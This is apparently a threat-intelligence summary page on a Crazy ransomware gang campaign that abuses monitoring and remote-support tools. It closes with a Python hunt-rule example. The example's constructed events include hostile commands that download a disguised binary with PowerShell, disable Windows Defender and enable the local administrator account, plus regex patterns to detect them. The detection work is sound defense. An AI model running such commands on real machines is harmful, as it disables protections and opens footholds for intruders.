Crazy ransomware gang Net Monitor for Employees Professional and SimpleHelp persistence campaign
Campaign
Summary
Crazy ransomware gang is running a remote-access persistence campaign that uses legitimate monitoring and support tools to keep footholds inside corporate networks, raising the risk of ransomware deployment. Researchers observed the operators pair Net Monitor for Employees Professional with SimpleHelp to blend in with normal administration while preserving access. The tradecraft includes compromised SSL VPN credentials, disguised filenames, and attempts to disable Windows Defender. In one case, the actors also monitored for cryptocurrency wallets and remote-management tools to support follow-on extortion.
Related Happenings
Russian-speaking hacker AI-assisted FortiGate breach campaign
Campaign
First: 21.02.2026 15:50
Last: 21.02.2026 15:50
Sources 1
About this happening:
The **Russian-speaking** threat actor ran an **AI-assisted FortiGate breach campaign** from **January 11 to February 18, 2026**, compromising **over 600 FortiGate devices** across...
Atomic MacOS Stealer (AMOS) distribution through AI-app lures, SEO poisoning, and supply-chain abuse
Malware Activity
First: 12.02.2026 16:25
Last: 12.02.2026 16:25
Sources 1
About this happening:
**Atomic MacOS Stealer (AMOS)** is being distributed to **macOS users** through multiple delivery paths, including **fraudulent GitHub repositories**, **SEO poisoning**, **malvert...
BlueNoroff spear-phishing campaign uses typosquatted Zoom, Teams, and Calendly lures against crypto firms
Campaign
First: 11.02.2026 00:17
Last: 11.02.2026 00:17
Sources 1
About this happening:
**BlueNoroff**, a **North Korea-linked Lazarus Group** subgroup, ran a **large-scale spear-phishing campaign** against **100+ cryptocurrency organizations** in **20+ countries** b...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation Wave
First: 09.02.2026 16:42
Last: 09.02.2026 16:42
Sources 1
About this happening:
**SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
Latest development: 10.03.2026 08:17
CISA added CVE-2025-26399 in SolarWinds Web Help Desk to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation, said Microsoft and Huntress had reported threat actors using SolarWinds Web Help Desk flaws to obtain initial access, attributed the activity to the Warlock ransomware crew, and ordered Federal Civilian Executive Branch (FCEB) agencies to apply the fix by March 12, 2026.
SmarterTools hit by ransomware attack
Incident
First: 09.02.2026 14:02
Last: 09.02.2026 14:02
Sources 1
About this happening:
**SmarterTools** suffered a **ransomware attack** on **January 29** after attackers used an **unpatched SmarterMail VM** to gain access, disrupting the company’s **office network*...
Latest development: 10.02.2026 12:24
ReliaQuest identified activity likely tied to Warlock on SmarterTools systems that abused CVE-2026-23760 to bypass SmarterMail authentication, stage ransomware payloads on internet-facing systems, and chain the access with the software's built-in Volume Mount feature to gain full system control before installing Velociraptor; CISA also confirmed CVE-2026-24423 was being exploited in ransomware attacks.
Timeline
- 11.02.2026 21:29 · 2 articles
Crazy ransomware gang expands a remote-access persistence campaign
Campaign Scope Update
Huntress observed multiple intrusions in which a member of the Crazy ransomware gang used Net Monitor for Employees Professional and SimpleHelp to maintain persistence in corporate networks, blend in with normal administration, and prepare for ransomware deployment. In one intrusion, the attackers installed Net Monitor for Employees Professional with msiexec.exe, then downloaded and executed SimpleHelp via PowerShell using filenames such as vhost.exe and C:\ProgramData\OneDriveSvc\OneDriveSvc.exe; they also tried to enable the local administrator account and disable Windows Defender. In one incident, SimpleHelp rules were configured to watch for cryptocurrency-wallet terms and remote-management keywords such as RDP, anydesk, ultraview, teamview, and VNC. Huntress said compromised SSL VPN credentials enabled both breaches, while the reused vhost.exe filename and overlapping C2 infrastructure suggested the same operator was behind both cases.
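The artifacts named in this update (an msiexec install of Net Monitor for Employees, PowerShell staging into C:\ProgramData\OneDriveSvc\, the vhost.exe filename, Defender tampering, and enabling the local administrator account) can be turned into process-creation hunt rules; the Python below is an added example, not Huntress's or BleepingComputer's code. The event field names and every sample command line are constructed, and the Set-MpPreference and net user forms are assumptions about how the tampering the report mentions would surface in logs.

```python
import re

# Constructed sample process-creation events (not real telemetry). The field
# names are an assumed simplification of Sysmon Event ID 1 / EDR records.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\Public\NetMonitorEmployeesPro.msi" /qn'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest http://example.invalid/x "
                r"-OutFile C:\ProgramData\OneDriveSvc\OneDriveSvc.exe"},
    {"image": r"C:\ProgramData\OneDriveSvc\OneDriveSvc.exe", "cmdline": "OneDriveSvc.exe"},
    {"image": r"C:\Users\Public\vhost.exe", "cmdline": "vhost.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"image": r"C:\Windows\System32\net.exe", "cmdline": "net user administrator /active:yes"},
    # Benign look-alikes that must not fire: the real OneDrive client and an
    # unrelated silent MSI install.
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "cmdline": "OneDrive.exe /background"},
    {"image": r"C:\Windows\System32\msiexec.exe", "cmdline": r'msiexec.exe /i "C:\Temp\7zip.msi" /qn'},
]

# Each rule is (name, predicate). Filenames and the staging path come from the
# reporting above; matching the MSI by product name is an assumption.
RULES = [
    ("netmonitor_msi_install",
     lambda e: e["image"].lower().endswith("\\msiexec.exe")
               and re.search(r"net\s*monitor", e["cmdline"], re.I)),
    ("simplehelp_disguised_binary",
     lambda e: e["image"].lower().endswith("\\vhost.exe")
               or e["image"].lower() == r"c:\programdata\onedrivesvc\onedrivesvc.exe"),
    ("powershell_stages_to_onedrivesvc",
     lambda e: e["image"].lower().endswith("\\powershell.exe")
               and "\\programdata\\onedrivesvc\\" in e["cmdline"].lower()),
    ("defender_tamper",
     lambda e: re.search(r"set-mppreference.*-disable", e["cmdline"], re.I)),
    ("local_admin_enabled",
     lambda e: re.search(r"net1?(\.exe)?\s+user\s+administrator\s+/active:yes",
                         e["cmdline"], re.I)),
]


def evaluate(events):
    """Return (rule_name, event_index) for every event a rule matches."""
    return [(name, i) for i, e in enumerate(events) for name, pred in RULES if pred(e)]


def triage(events):
    """Distinct rules seen on one host; several together is the pattern Huntress
    described (install, staging, disguised binary, tampering), not one-off noise."""
    return sorted({name for name, _ in evaluate(events)})
```
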
- Crazy ransomware gang abuses employee monitoring tool in attacks — www.bleepingcomputer.com — 11.02.2026 21:29